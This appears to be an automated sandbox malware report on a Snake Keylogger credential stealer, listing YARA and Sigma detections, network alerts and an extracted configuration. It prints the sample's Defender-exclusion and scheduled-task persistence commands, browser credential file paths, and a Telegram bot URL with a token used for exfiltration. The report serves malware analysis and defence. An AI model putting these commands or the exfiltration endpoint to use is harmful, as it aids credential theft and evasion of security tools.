10.2.uyDicX.exe.3d19728.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a5d:$a1: get_encryptedPassword 0x3547d:$a1: get_encryptedPassword 0x55c9d:$a1: get_encryptedPassword 0x14d49:$a2: get_encryptedUsername 0x35769:$a2: get_encryptedUsername 0x55f89:$a2: get_encryptedUsername 0x14869:$a3: get_timePasswordChanged 0x35289:$a3: get_timePasswordChanged 0x55aa9:$a3: get_timePasswordChanged 0x14964:$a4: get_passwordField 0x35384:$a4: get_passwordField 0x55ba4:$a4: get_passwordField 0x14a73:$a5: set_encryptedPassword 0x35493:$a5: set_encryptedPassword 0x55cb3:$a5: set_encryptedPassword 0x1610c:$a7: get_logins 0x36b2c:$a7: get_logins 0x5734c:$a7: get_logins 0x1606f:$a10: KeyLoggerEventArgs 0x36a8f:$a10: KeyLoggerEventArgs 0x572af:$a10: KeyLoggerEventArgs
10.2.uyDicX.exe.3d19728.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c430:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce50:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d670:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b662:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c082:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c8a2:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba95:$a4: \Orbitum\User Data\Default\Login Data 0x3c4b5:$a4: \Orbitum\User Data\Default\Login Data 0x5ccd5:$a4: \Orbitum\User Data\Default\Login Data 0x1cad4:$a5: \Kometa\User Data\Default\Login Data 0x3d4f4:$a5: \Kometa\User Data\Default\Login Data 0x5dd14:$a5: \Kometa\User Data\Default\Login Data
10.2.uyDicX.exe.3d19728.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15650:$s1: UnHook 0x36070:$s1: UnHook 0x56890:$s1: UnHook 0x15657:$s2: SetHook 0x36077:$s2: SetHook 0x56897:$s2: SetHook 0x1565f:$s3: CallNextHook 0x3607f:$s3: CallNextHook 0x5689f:$s3: CallNextHook 0x1566c:$s4: _hook 0x3608c:$s4: _hook 0x568ac:$s4: _hook
10.2.uyDicX.exe.3d19728.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a42:$x1: $%SMTPDV$ 0x3a462:$x1: $%SMTPDV$ 0x5ac82:$x1: $%SMTPDV$ 0x18414:$x2: $#TheHashHere%& 0x38e34:$x2: $#TheHashHere%& 0x59654:$x2: $#TheHashHere%& 0x199ea:$x3: %FTPDV$ 0x3a40a:$x3: %FTPDV$ 0x5ac2a:$x3: %FTPDV$ 0x183b4:$x4: $%TelegramDv$ 0x38dd4:$x4: $%TelegramDv$ 0x595f4:$x4: $%TelegramDv$ 0x15cda:$x5: KeyLoggerEventArgs 0x1606f:$x5: KeyLoggerEventArgs 0x366fa:$x5: KeyLoggerEventArgs 0x36a8f:$x5: KeyLoggerEventArgs 0x56f1a:$x5: KeyLoggerEventArgs 0x572af:$x5: KeyLoggerEventArgs 0x19a0e:$m2: Clipboard Logs ID 0x19c4c:$m2: Screenshot Logs ID 0x19d5c:$m2: keystroke Logs ID
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a5d:$a1: get_encryptedPassword 0x3527d:$a1: get_encryptedPassword 0x14d49:$a2: get_encryptedUsername 0x35569:$a2: get_encryptedUsername 0x14869:$a3: get_timePasswordChanged 0x35089:$a3: get_timePasswordChanged 0x14964:$a4: get_passwordField 0x35184:$a4: get_passwordField 0x14a73:$a5: set_encryptedPassword 0x35293:$a5: set_encryptedPassword 0x1610c:$a7: get_logins 0x3692c:$a7: get_logins 0x1606f:$a10: KeyLoggerEventArgs 0x3688f:$a10: KeyLoggerEventArgs 0x15cda:$a11: KeyLoggerEventArgsEventHandler 0x364fa:$a11: KeyLoggerEventArgsEventHandler
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15650:$s1: UnHook 0x35e70:$s1: UnHook 0x15657:$s2: SetHook 0x35e77:$s2: SetHook 0x1565f:$s3: CallNextHook 0x35e7f:$s3: CallNextHook 0x1566c:$s4: _hook 0x35e8c:$s4: _hook
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a42:$x1: $%SMTPDV$ 0x3a262:$x1: $%SMTPDV$ 0x18414:$x2: $#TheHashHere%& 0x38c34:$x2: $#TheHashHere%& 0x199ea:$x3: %FTPDV$ 0x3a20a:$x3: %FTPDV$ 0x183b4:$x4: $%TelegramDv$ 0x38bd4:$x4: $%TelegramDv$ 0x15cda:$x5: KeyLoggerEventArgs 0x1606f:$x5: KeyLoggerEventArgs 0x364fa:$x5: KeyLoggerEventArgs 0x3688f:$x5: KeyLoggerEventArgs 0x19a0e:$m2: Clipboard Logs ID 0x19c4c:$m2: Screenshot Logs ID 0x19d5c:$m2: keystroke Logs ID 0x3a22e:$m2: Clipboard Logs ID 0x3a46c:$m2: Screenshot Logs ID 0x3a57c:$m2: keystroke Logs ID 0x1a036:$m3: SnakePW 0x3a856:$m3: SnakePW 0x19c24:$m4: \SnakeKeylogger\
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a5d:$a1: get_encryptedPassword 0x3547d:$a1: get_encryptedPassword 0x55c9d:$a1: get_encryptedPassword 0x14d49:$a2: get_encryptedUsername 0x35769:$a2: get_encryptedUsername 0x55f89:$a2: get_encryptedUsername 0x14869:$a3: get_timePasswordChanged 0x35289:$a3: get_timePasswordChanged 0x55aa9:$a3: get_timePasswordChanged 0x14964:$a4: get_passwordField 0x35384:$a4: get_passwordField 0x55ba4:$a4: get_passwordField 0x14a73:$a5: set_encryptedPassword 0x35493:$a5: set_encryptedPassword 0x55cb3:$a5: set_encryptedPassword 0x1610c:$a7: get_logins 0x36b2c:$a7: get_logins 0x5734c:$a7: get_logins 0x1606f:$a10: KeyLoggerEventArgs 0x36a8f:$a10: KeyLoggerEventArgs 0x572af:$a10: KeyLoggerEventArgs
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15650:$s1: UnHook 0x36070:$s1: UnHook 0x56890:$s1: UnHook 0x15657:$s2: SetHook 0x36077:$s2: SetHook 0x56897:$s2: SetHook 0x1565f:$s3: CallNextHook 0x3607f:$s3: CallNextHook 0x5689f:$s3: CallNextHook 0x1566c:$s4: _hook 0x3608c:$s4: _hook 0x568ac:$s4: _hook
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a42:$x1: $%SMTPDV$ 0x3a462:$x1: $%SMTPDV$ 0x5ac82:$x1: $%SMTPDV$ 0x18414:$x2: $#TheHashHere%& 0x38e34:$x2: $#TheHashHere%& 0x59654:$x2: $#TheHashHere%& 0x199ea:$x3: %FTPDV$ 0x3a40a:$x3: %FTPDV$ 0x5ac2a:$x3: %FTPDV$ 0x183b4:$x4: $%TelegramDv$ 0x38dd4:$x4: $%TelegramDv$ 0x595f4:$x4: $%TelegramDv$ 0x15cda:$x5: KeyLoggerEventArgs 0x1606f:$x5: KeyLoggerEventArgs 0x366fa:$x5: KeyLoggerEventArgs 0x36a8f:$x5: KeyLoggerEventArgs 0x56f1a:$x5: KeyLoggerEventArgs 0x572af:$x5: KeyLoggerEventArgs 0x19a0e:$m2: Clipboard Logs ID 0x19c4c:$m2: Screenshot Logs ID 0x19d5c:$m2: keystroke Logs ID
Click to see the 41 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ProcessId: 6580, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uyDicX.exe, ParentImage: C:\Users\user\AppData\Roaming\uyDicX.exe, ParentProcessId: 5144, ParentProcessName: uyDicX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp", ProcessId: 3060, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", ProcessId: 6524, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ProcessId: 6580, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", ProcessId: 6524, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T11:45:24.116190+0100	2803305	3	Unknown Traffic	192.168.2.5	49713	104.21.64.1	443	TCP
2025-03-07T11:45:25.538337+0100	2803305	3	Unknown Traffic	192.168.2.5	49714	104.21.64.1	443	TCP
2025-03-07T11:45:34.298849+0100	2803305	3	Unknown Traffic	192.168.2.5	49736	104.21.64.1	443	TCP
2025-03-07T11:45:38.462067+0100	2803305	3	Unknown Traffic	192.168.2.5	49751	104.21.64.1	443	TCP
2025-03-07T11:45:41.708409+0100	2803305	3	Unknown Traffic	192.168.2.5	49760	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T11:45:18.923663+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	193.122.6.168	80	TCP
2025-03-07T11:45:20.621341+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49709	193.122.6.168	80	TCP
2025-03-07T11:45:21.761949+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	193.122.6.168	80	TCP
2025-03-07T11:45:23.262099+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49709	193.122.6.168	80	TCP
2025-03-07T11:45:24.824456+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49715	193.122.6.168	80	TCP
2025-03-07T11:45:26.246339+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	193.122.6.168	80	TCP

ETPRO MALWARE Snake Keylogger Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T11:45:51.541969+0100	2853006	1	A Network Trojan was detected	192.168.2.5	49785	149.154.167.220	443	TCP
2025-03-07T11:45:52.798286+0100	2853006	1	A Network Trojan was detected	192.168.2.5	49786	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T11:45:50.908492+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49785	149.154.167.220	443	TCP
2025-03-07T11:45:52.004507+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49786	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: HBL NO C-ACC-250002.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\uyDicX.exe

Avira: detection malicious, Label: TR/AD.SnakeStealer.njjud

Found malware configuration

Source: 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage?chat_id=5649235024", "Token": "7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0", "Chat_id": "5649235024", "Version": "5.1"}
Source: HBL NO C-ACC-250002.exe.1960.9.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\uyDicX.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Virustotal: Detection: 55%			Perma Link

Multi AV Scanner detection for submitted file

Source: HBL NO C-ACC-250002.exe	Virustotal: Detection: 43%			Perma Link
Source: HBL NO C-ACC-250002.exe	ReversingLabs: Detection: 44%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	String decryptor:
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	String decryptor: 7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	String decryptor: 5649235024

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: HBL NO C-ACC-250002.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49712 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49786 version: TLS 1.2

Source: HBL NO C-ACC-250002.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 07343206h	0_2_07342AB3
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 00E4F1F6h	9_2_00E4F007
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 00E4FB80h	9_2_00E4F007
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_00E4E528
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_00E4EB5B
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_00E4ED3C
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 05091A38h	9_2_05091620
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 05091471h	9_2_050911C0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 050902F1h	9_2_05090040
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 05091011h	9_2_05090D60
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509F009h	9_2_0509ED60
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509C041h	9_2_0509BD98
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509DEA9h	9_2_0509DC00
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 05090751h	9_2_050904A0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509E759h	9_2_0509E4B0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509B791h	9_2_0509B4E8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509DA51h	9_2_0509D7A8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509F8B9h	9_2_0509F610
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 05091A38h	9_2_05091610
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509C8F1h	9_2_0509C648
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509D1A1h	9_2_0509CEF8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509EBB1h	9_2_0509E908
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 05090BB1h	9_2_05090900
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509BBE9h	9_2_0509B940
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 05091A38h	9_2_05091966
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509F461h	9_2_0509F1B8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509C499h	9_2_0509C1F0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509E301h	9_2_0509E058
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509D5F9h	9_2_0509D350
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509FD11h	9_2_0509FA68
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 4x nop then jmp 0509CD49h	9_2_0509CAA0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 02B4F1F6h	14_2_02B4F007
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 02B4FB80h	14_2_02B4F007
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_02B4E528
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_02B4EB5B
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_02B4ED3C
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057B1011h	14_2_057B0D60
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BF009h	14_2_057BED60
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057B1A38h	14_2_057B1966
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BBBE9h	14_2_057BB940
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BEBB1h	14_2_057BE908
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057B0BB1h	14_2_057B0900
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BC499h	14_2_057BC1F0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057B1471h	14_2_057B11C0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BF461h	14_2_057BF1B8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BC041h	14_2_057BBD98
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BE301h	14_2_057BE058
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057B02F1h	14_2_057B0040
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BDEA9h	14_2_057BDC00
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BB791h	14_2_057BB4E8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BE759h	14_2_057BE4B0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057B0751h	14_2_057B04A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BD5F9h	14_2_057BD350
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BDA51h	14_2_057BD7A8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BFD11h	14_2_057BFA68
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BC8F1h	14_2_057BC648
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057B1A38h	14_2_057B1620
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BF8B9h	14_2_057BF610
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BD1A1h	14_2_057BCEF8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 057BCD49h	14_2_057BCAA0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06998945h	14_2_06998608
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06996171h	14_2_06995EC8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_069936CE
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 069958C1h	14_2_06995618
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06995D19h	14_2_06995A70
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_069933B8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_069933A8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06996E79h	14_2_06996BD0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 069965C9h	14_2_06996320
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06996A21h	14_2_06996778
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06990741h	14_2_06990498
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06997751h	14_2_069974A8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06990B99h	14_2_069908F0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 069972FAh	14_2_06997050
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 069902E9h	14_2_06990040
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06995441h	14_2_06995198
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06998459h	14_2_069981B0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06997BA9h	14_2_06997900
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06998001h	14_2_06997D58
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 4x nop then jmp 06990FF1h	14_2_06990D48

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49785 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49786 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49785 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49786 -> 149.154.167.220:443

